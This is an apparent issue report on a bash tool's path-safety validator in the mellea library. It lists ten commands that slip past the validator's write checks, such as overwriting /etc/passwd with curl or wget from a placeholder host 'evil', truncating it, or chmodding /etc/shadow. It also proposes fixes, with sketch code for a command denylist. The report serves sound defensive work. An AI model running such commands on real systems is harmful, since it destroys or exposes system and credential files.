Surfaced during PR #1056 review. The path-safety functions in mellea/stdlib/tools/shell.py (_check_dangerous_paths at L348, _check_working_dir_restriction at L408) early-return unless argv[0] is in a hardcoded 8-command set: {rm, touch, cp, mv, mkdir, mkfifo, mknod, tee}. Any other write primitive — and any wrapper-prefixed write — bypasses both checks. Filed so the bash tool can ship in #1056 and the docstrings stay honest about what the validator actually covers.
Problem
The bash_executor docstring states "Safety defaults: Refuses … writes to system paths (/etc, /sys, /proc, etc.)". The validator does not match this claim.
Verified against PR head c7623279 — all 10 return success=True, skipped=False:
# Wrapper bypass — argv[0] is the wrapper, not the write command
env touch /etc/passwd
nohup rm /etc/passwd
timeout 10 cp /etc/foo /etc/bar
# Write primitives not in `write_commands`
chmod 777 /etc/shadow
chown root /etc/passwd
install -m 644 src /etc/foo
ln -sf /etc/shadow /tmp/x
truncate -s 0 /etc/passwd
curl -o /etc/passwd http://evil/
wget -O /etc/passwd http://evil/
For bash_executor (Docker-isolated), the container is the actual write boundary, so the practical impact is bounded. For unsafe_local_bash_executor (no isolation) the gap matters — the docstring leads developers to grant the tool more authority than its checks justify.
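To make the bypass concrete, here is a minimal model of the early-return gate described above. It is a sketch for illustration, not the code in shell.py: the function name `gate_blocks`, the constant names, and the prefix list are assumptions (the docstring only lists "/etc, /sys, /proc, etc.").

```python
import shlex

# Hypothetical stand-in for the gate described in this issue; not the real validator.
WRITE_COMMANDS = {"rm", "touch", "cp", "mv", "mkdir", "mkfifo", "mknod", "tee"}
SYSTEM_PREFIXES = ("/etc", "/sys", "/proc")  # assumed subset of the protected paths


def is_system_path(path: str) -> bool:
    """True if path is a protected prefix or lies underneath one."""
    return any(path == p or path.startswith(p + "/") for p in SYSTEM_PREFIXES)


def gate_blocks(command: str) -> bool:
    """Return True if this simplified gate would refuse the command."""
    argv = shlex.split(command)
    if not argv or argv[0] not in WRITE_COMMANDS:
        # Early return: nothing past argv[0] is ever inspected.
        return False
    return any(is_system_path(arg) for arg in argv[1:])


print(gate_blocks("touch /etc/passwd"))      # True: argv[0] is in the set
print(gate_blocks("env touch /etc/passwd"))  # False: argv[0] is the wrapper
print(gate_blocks("chmod 777 /etc/shadow"))  # False: chmod is not in the set
```

Under this model, every command in the list above falls through the early return, which matches the observed success=True, skipped=False results.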
Two valid resolution paths
Path 1 — extend the gate. Walk past a SAFE_WRAPPER_COMMANDS prefix and re-check the effective command. Add chmod, chown, dd (with of= parsing), install, ln, truncate, wget, curl to write_commands.
Path 2 — reframe the docstring. Position the denylist as a coarse filter and treat Docker isolation in LLMSandboxBashEnvironment as the actual write boundary. Drop or qualify the "Refuses writes to system paths" claim. Cleaner for bash_executor; unsafe_local_bash_executor still needs Path 1.
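Path 1 could look roughly like the sketch below. The function names and the contents of `SAFE_WRAPPER_COMMANDS`, `WRITE_COMMANDS`, and `SYSTEM_PREFIXES` are assumptions made for illustration; the real constants in shell.py may differ. The wrapper handling is deliberately conservative: after a wrapper it scans forward to the first known write command instead of parsing each wrapper's own options.

```python
import shlex

# All names and set contents here are hypothetical, chosen to mirror the issue text.
SAFE_WRAPPER_COMMANDS = {"env", "nohup", "timeout"}
WRITE_COMMANDS = {
    "rm", "touch", "cp", "mv", "mkdir", "mkfifo", "mknod", "tee",
    "chmod", "chown", "dd", "install", "ln", "truncate", "wget", "curl",
}
SYSTEM_PREFIXES = ("/etc", "/sys", "/proc")


def is_system_path(path: str) -> bool:
    """True if path is a protected prefix or lies underneath one."""
    return any(path == p or path.startswith(p + "/") for p in SYSTEM_PREFIXES)


def effective_argv(argv: list[str]) -> list[str]:
    """Skip a wrapper prefix and return argv starting at the wrapped write command."""
    if argv and argv[0] in SAFE_WRAPPER_COMMANDS:
        for i, token in enumerate(argv[1:], start=1):
            if token in WRITE_COMMANDS:
                return argv[i:]
        return []  # wrapper around something that is not a known write command
    return argv


def touches_system_path(command: str) -> bool:
    """Return True if the effective command is a write primitive aimed at a system path."""
    argv = effective_argv(shlex.split(command))
    if not argv or argv[0] not in WRITE_COMMANDS:
        return False
    for arg in argv[1:]:
        # dd names its output as of=PATH, so strip the operand prefix first.
        if argv[0] == "dd" and arg.startswith("of="):
            arg = arg[len("of="):]
        if is_system_path(arg):
            return True
    return False


print(touches_system_path("timeout 10 cp /etc/foo /etc/bar"))  # True
print(touches_system_path("dd if=/dev/zero of=/etc/passwd"))   # True
print(touches_system_path("env ls /etc"))                      # False
```

This sketch flags any system-path argument of a write command, including sources such as the first operand of ln, so it errs toward refusing. It does not normalize paths (relative paths, `..` segments, symlinks) or handle attached option values such as `-o/etc/passwd`; a real fix would need to cover those cases as well.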
Success criteria
bash_executor and unsafe_local_bash_executor docstrings (around L827–855 and L859–885) match the chosen framing; no claim should overstate what the validator catches.